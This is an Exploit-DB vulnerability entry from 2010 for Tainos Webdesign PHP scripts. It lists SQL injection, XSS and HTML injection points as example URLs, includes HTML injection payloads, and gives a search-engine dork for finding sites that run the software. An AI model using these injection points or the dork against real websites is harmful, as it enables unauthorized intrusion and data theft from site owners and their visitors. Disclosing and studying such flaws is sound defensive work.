Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection

EDB-ID:

12631

CVE:

N/A

Author:

CoBRa_21

Type:

webapps

Platform:

PHP

Published:

2010-05-17

-------------------------------------------------------------------------------------------

Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://www.tainos-webdesign.com

Dork: intext:"© Tainos Webdesign"

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/propertylux.php?ID=1 (SQL)
http://localhost/[path]/property.php?ID=199 (SQL)

-------------------------------------------------------------------------------------------

XSS Injection:

http://localhost/[path]/class.php?Class=Rental&Subclass=
http://localhost/[path]/class.php?Class=Sales&Subclass=
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=
-------------------------------------------------------------------------------------------

HTML Injection:

http://localhost/[path]/class.php?Class=Rental&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/class.php?Class=Sales&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=<font color=red size=15>CoBRa_21</font>
-------------------------------------------------------------------------------------------